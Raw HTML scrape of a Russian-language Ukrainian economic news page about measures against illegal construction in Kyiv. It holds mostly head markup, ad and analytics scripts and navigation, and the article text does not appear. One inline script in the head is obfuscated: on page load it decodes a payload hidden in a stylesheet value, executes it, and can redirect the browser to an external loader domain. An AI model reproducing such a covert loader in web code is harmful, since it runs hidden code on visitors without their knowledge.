<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Сергей Петрик рассказал о мерах борьбы с незаконным строительством | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Сергей Петрик рассказал о мерах борьбы с незаконным строительством "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/wp-content/uploads/2019/10/petrik_03.jpg"/><meta property="og:type" content="article" /><meta property="og:image:width" content="460" /><meta property="og:image:height" content="348" /><meta property="og:image:alt" content="Сергей Петрик рассказал о мерах борьбы с незаконным строительством " /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><meta name="description" content="Мэр Киева Виталий Кличко призвал премьер-министра Алексея Гончарука способствовать совершенствованию нормативной базы для эффективной борьбы с самовольным строительством." /><meta property="og:description" content="Мэр Киева Виталий Кличко призвал премьер-министра Алексея Гончарука способствовать совершенствованию нормативной базы для эффективной борьбы с самовольным строительством." /><meta name="keywords" content="сергей петрик,новости киева,эксклюзивные новости" /><link rel="canonical" href="https://enovosty.com/news_kiev/full/1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom" /><meta property="og:url" content="https://enovosty.com/news_kiev/full/1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom" /><style>.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><style>.wp-polls .pollbar{margin:1px;font-size:6px;line-height:8px;height:8px;background-image:url('https://enovosty.com/wp-content/plugins/wp-polls/images/default/pollbg.gif');border:1px solid #c8c8c8}</style><link rel="amphtml" href="https://enovosty.com/news_kiev/full/1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4778294';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><link rel="preload" as="style" disabled type="text/css" rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/mainstyle.css" /><script type="text/javascript">!function(){var mt="",t="Tag",e="natural",vt="src",st="loader",r="arg",pt="style",gt="text",n="ready",ht=":",a="STC",yt="script",o="image",i="parent",c="append",u="By",l="?",bt="IFRAME",f="add",d="*",A="Name",wt="code",m="Listener",v="no",s="https",p="m",g="Int",h="bold",y="green",b="c",St="_",Ct="write",w="Window",S="Timeout",C="al",Et="call",E="background",M="set",O="IAAAAUEBAAAACw",k="from",Mt="FRAME",B="has",Ot="href",D="Uza",kt="Document",I="create",Bt="Node",F="Of",R="AAA",j="remove",Dt="java",N="Computed",Q="2",It="bind",T="com",Z=".",x=";",Ft="cookie",Rt="close",H="base",L="GODlh",U="query",q="Property",z="HM",G='"',J="weight",jt="substr",Nt="warn",P="Selector",Qt="floor",W="parse",X="Storage",Y="d1e",_="timeout",Tt="id",Zt="cdn",xt="location",Ht="document",K="AAAQABAAACAk",V="Height",Lt="random",Ut="type",qt="head",zt="Em",$="ttt",tt="Loaded",et="Event",rt=")",Gt="Image",Jt="loading",nt="%",Pt="&",Wt="name",at="S",Xt="length",ot="@import",it="local",ct="font",Yt=",",ut="Style",lt="Descriptor",ft="'",dt="Child",At="color",_t="get",Kt="1",Vt=" ",$t="ZZZ2m",te="data",ee="gif",re="Own",ne="debug",ae="Math",oe="Item",ie="Content",ce="link",ue="complete",le="load",fe="Attribute",de="(",Ae="=",me="AQABA",ve="Elements",se="replace",pe="DOMContent",ge="match",he="content",ye="NO",be="key",we="/",Se="f4FFv",Ce="State",Ee="R1cj",Me="Element",Oe="atob",ke="-",Be="MSStream",De="<",Ie="Object",Fe="opener",Re="R0l",je=">",Ne="disabled",Qe="console",Te="r",Ze="index",xe="QBADs",He="prototype",Le="YXJnb24",Ue="All",qe=$+$t,ze=te+ht+o+we+ee+x+H,Ge=(Yt=Yt,O+R),Je=Re+L+me,Pe=K+xe+Ae,We=C+Ee+D+z+Ae,Xe=(St=St,De+ye),Ye=at+je,_e=I+Me,Ke=_t+ve+u+t+A,Ve=c+dt,$e=he+w,tr=_t+re+q+lt,er=n+Ce,rr=f+et+m,nr=U+P+Ue,ar=j+dt,or=M+S,ir=W+g,cr=_t+N+ut,ur=Le+Ae,lr=Q+Ae+Kt,fr=nt+b,dr=At+ht+y+x+ct+ke+J+ht+h,Ar=it+X,mr=_t+oe,vr=Ze+F,sr=Y+Ae,pr=j+oe,gr=s+ht+we+we,hr=Z+T+we+l+Te+Ae,yr=(Pt=Pt,gt+ie),br=de+rt+x,wr=St+p,Sr=B+fe,Cr=ot+Vt+ft,Er=ft+x,Mr=De+pt+je,Or=we+d,kr=d+we,Br=De+we+pt+je,Dr=e+V,Ir=i+Bt,Fr=pe+tt,Rr=le+Vt+r,jr=E+Gt,Nr=G+rt,Qr=(ht=ht,Jt+Vt+k+Vt+a),Tr=a+Vt+_,Zr=v+Vt+a;!function(){var t=window,i=t[Ht],e=Mt,r=ne,n=Dt,c=n+yt,a=wt,o=zt+a,u=0,l=1,f=2,d=3,A=10,m=8*f,v=A*A,s=m*m,p=s*s,g=s*d+d*(m+l),h=qe,y=Se,b=st,w=b+Zt,S=ze+m*f*f+Yt,C=Ge,E=S+Je+C+Pe,M=t[ae][Qt],O=t[ae][Lt],k=function(t){i[Ct](t)},B=u,D=m,I=u,F=u,R=function(){},j=We;try{if(t[Fe][St+h]==y)return t[Fe][St+h]=mt,k(Xe+e+Ye),i[Rt]()}catch(t){}var N=i[_e](bt),Q=i[Ke](qt)[0],T=ot();N[Wt]=T,Q[Ve](N);var Z,x,H,L,U=T?t[T]:N[$e],q=u;try{H=U[Ht]}catch(t){return}try{Z=U[Ie][tr](U[kt][He],er)[_t][It](i),x=H[_e][It](i),L=U[Oe],j=L(j),q=!!U[Be]}catch(t){q=l}if(q)return ut(),ct();var z=new U[Gt],G=H[rr],J=(H[nr][It](i),U[Bt][He]),P=J[Ve],W=J[ar],X=(H[Ke][It](i),U[or][It](t)),Y=U[ir],_=U[cr][It](t),K=x[It](i,yt);k=H[Ct][It](i),M=U[ae][Qt],O=U[ae][Lt];var V=L(ur);H[Ft][ge](V+St+r+lr)&&(R=U[Qe][Nt][It](U[Qe],fr+o,dr)),z[vt]=E;for(var $=U[Ar]||[],tt=0;tt<$[Xt];tt++){var et=$[be](tt);if(Y(et[jt](0,d),m)+mt==et[jt](d)){var rt=$[mr](et);if(rt[Xt]<v&&rt[vr](sr)==u)return $[pr](et),t[xt]=gr+w+hr+t[xt]+Pt+rt}}var nt=ot(),at=K();function ot(){return wr+M(O()*p*p)}function it(t){dt(),B||(F=ut(l),I=ct(l),t())}function ct(t){var e=ft(ce,Ne);return e&&e[Sr](Ot)?lt(Cr+e[Ot]+Er,t):e}function ut(t){var e=ft(yt,Ut,pt);if(e)return lt(e[gt],t)}function lt(t,e){if(k(Mr+t+Or+ot()+kr+Br),e)return ft(pt)}function ft(t,e,r){for(var n=i[Ke](t),a=n[Xt];-1<--a;)if(!e||n[a][Sr](e)&&(!r||n[a][e]==r))return n[a]}function dt(){z[ue]?z[Dr]||(B=l,I&&I[Ir][ar](I),F&&F[Ir][ar](F)):D--&&X(dt,l)}function At(){if(Z()==Jt)return G[Et](i,Fr,At);R(Rr);var t,e=x(pt);e[Tt]=j,P[Et](Q,e);var r=_(e)[jr];if(r[Xt]>v){var n=K(),a=r[jt](g)[se](Nr,mt),o=ot();U[o]=P[It](Q,n),t=a[jt](m*f),W[Et](Q,e),n[yr]=L(t),U[xt]=c+ht+o+br,R(Qr)}else Z()!=ue?(R(Tr),X(At,s)):R(Zr)}t[nt]=it[It](t,At),at[yr]=nt+br,P[Et](Q,at)}()}();</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4778294&amp;a=480" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script async src='https://www.googletagservices.com/tag/js/gpt.js'></script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});
</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:3px"> <div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top: 0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news_kiev/full/1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news_kiev/full/1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>25.23</td><td>24.64</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>27.93</td><td>27.14</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.40</td><td>0.30</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>525.70</td><td>0.00</td><td>16:49 17.10.2019</td> </tr> <tr class="tr_white"> <td>UX</td><td>1520.41</td><td>0.00</td><td>17:00 18.10.2019</td> </tr> <tr> <td>RTS</td><td>1355.31</td><td>0.13</td><td>17:10 18.10.2019</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>60.01</td><td>+0.17</td><td style="text-transform:uppercase;">Oct</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>67.49</td><td>-0.84</td><td style="text-transform:uppercase;">Aug</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>630.25</td><td>-0.52</td><td style="text-transform:uppercase;">Aug</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy"> <img src="https://enovosty.com/wp-content/themes/eizvestia/img/afisha3.png" width="56" alt="Деловая афиша" title="Деловая афиша" />Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li class="current-menu-item"><a href="https://enovosty.com/news_kiev">Киев</a></li><li><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news_politics/full/1810-ukrainskaya-zemlya-i-inostrancy-v-rade-neozhidanno-podderzhali-novyj-dokument" title="Украинская земля и иностранцы. В Раде неожиданно поддержали новый документ"><img width="210" height="156" alt="Украинская земля и иностранцы. В Раде неожиданно поддержали новый документ" src="https://enovosty.com/wp-content/uploads/2019/10/demenca.jpg"></a><a href="https://enovosty.com/news_politics/full/1810-ukrainskaya-zemlya-i-inostrancy-v-rade-neozhidanno-podderzhali-novyj-dokument" title="Украинская земля и иностранцы. В Раде неожиданно поддержали новый документ" class="name">Украинская земля и иностранцы. В Раде неожиданно поддержали новый документ <span>(1015)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news-markets/full/1810-v-ukraine-massovo-zakryvayutsya-molochnye-fermy-ceny-letyat-vverx" title="В Украине массово закрываются молочные фермы. Цены летят вверх"><img width="210" height="156" alt="В Украине массово закрываются молочные фермы. Цены летят вверх" src="https://enovosty.com/wp-content/uploads/2019/10/moloko.jpg"></a><a href="https://enovosty.com/news-markets/full/1810-v-ukraine-massovo-zakryvayutsya-molochnye-fermy-ceny-letyat-vverx" title="В Украине массово закрываются молочные фермы. Цены летят вверх" class="name">В Украине массово закрываются молочные фермы. Цены летят вверх <span>(320)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news-auto/full/1710-v-ukraine-sobirayutsya-usilit-kontrol-nad-bezopasnostyu-na-dorogax" title="В Украине собираются усилить контроль над безопасностью на дорогах"><img width="210" height="156" alt="В Украине собираются усилить контроль над безопасностью на дорогах" 